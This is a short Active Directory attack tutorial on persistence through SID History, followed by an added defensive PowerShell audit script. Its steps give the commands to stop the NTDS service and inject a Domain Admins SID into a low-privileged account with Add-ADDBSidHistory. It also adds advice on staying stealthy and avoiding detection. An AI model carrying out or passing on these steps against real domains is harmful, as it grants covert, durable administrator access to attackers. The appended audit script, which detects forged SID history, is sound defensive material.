SID history
By manipulating the SID History attribute, you can grant elevated privileges (e.g., Domain Admin or Enterprise Admin) to a low-privileged account without modifying its group memberships.
Key Points:
Requires Domain Admin privileges or equivalent.
SIDs in the token determine effective privileges, regardless of group membership.
Using Enterprise Admin SIDs can extend privileges across the forest.
Persistence can be stealthy by altering the SID history of secondary accounts.
Steps to Execute SID History Persistence
Step 1: Check SID History
Verify the current SID History and group memberships of an account:
Get-ADUser <your ad username> -properties sidhistory,memberof
Step 2: Identify Domain SID
Retrieve the domain SID (it is the prefix of the Domain Admins group's SID, before the trailing RID):
Get-ADGroup "Domain Admins"
Step 3: Forge SID History
Stop the Active Directory Domain Services (NTDS) service:
Stop-Service -Name ntds -force
Modify the SID History attribute of a low-privileged account:
Add-ADDBSidHistory -SamAccountName '<username>' -SidHistory '<SID to add>'
Replace <username> with the low-privileged account and <SID to add> with the desired SID (e.g., the Domain Admins SID).
Restart the NTDS service:
Start-Service -Name ntds
Step 4: Verify Elevated Privileges
The modified account will now effectively have Domain Admin access, even if it remains a simple Domain Users account.
Key Notes
Be cautious about detection: Modify SID History indirectly via a secondary account for added stealth.
SIDs persist in user tokens during logon, making this a durable form of persistence.
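As an added defensive counterpart (example code, not part of the original page), the following script audits every object with a populated sIDHistory and flags entries that carry a privileged RID or belong to the current domain rather than a migrated one, which is exactly the footprint the technique above leaves. It assumes the RSAT ActiveDirectory module and a domain-joined session with read access to the directory; the RID table and output field names are the example's own choices.

```powershell
# Added example (not from the original page): audit sIDHistory across the domain and flag
# entries that indicate forged SID history. Assumes the RSAT ActiveDirectory module and a
# domain-joined session with read access to the directory.
Import-Module ActiveDirectory

# Well-known RIDs that have no legitimate reason to appear in sIDHistory.
$PrivilegedRids = @{
    500 = 'Administrator'
    512 = 'Domain Admins'
    518 = 'Schema Admins'
    519 = 'Enterprise Admins'
}

# sIDHistory exists for SIDs migrated from *other* domains; a SID from the current
# domain (as in the forged case described above) is a strong indicator of tampering.
$LocalDomainSid = (Get-ADDomain).DomainSID.Value

$Findings = foreach ($Obj in (Get-ADObject -LDAPFilter '(sIDHistory=*)' -Properties sIDHistory)) {
    foreach ($Entry in $Obj.sIDHistory) {
        # Normalise to a SecurityIdentifier whether the module returned an object or raw bytes.
        $Sid = if ($Entry -is [byte[]]) {
            New-Object System.Security.Principal.SecurityIdentifier($Entry, 0)
        } else { [System.Security.Principal.SecurityIdentifier]$Entry }

        $SidString  = $Sid.Value
        $Rid        = [int]($SidString -split '-')[-1]
        $DomainPart = $SidString.Substring(0, $SidString.LastIndexOf('-'))
        $Reasons    = @()

        if ($PrivilegedRids.ContainsKey($Rid)) {
            $Reasons += "privileged RID $Rid ($($PrivilegedRids[$Rid]))"
        }
        if ($DomainPart -eq $LocalDomainSid) {
            $Reasons += 'SID is from the current domain, not a migrated one'
        }
        if ($Reasons.Count -gt 0) {
            [pscustomobject]@{
                Account    = $Obj.DistinguishedName
                HistorySid = $SidString
                Reason     = ($Reasons -join '; ')
            }
        }
    }
}

$Findings | Format-Table -AutoSize
```

Because an offline edit of the NTDS database bypasses the LSA code path that logs event ID 4765 (SID History added to an account), this attribute audit should run on a schedule rather than relying on event logs alone.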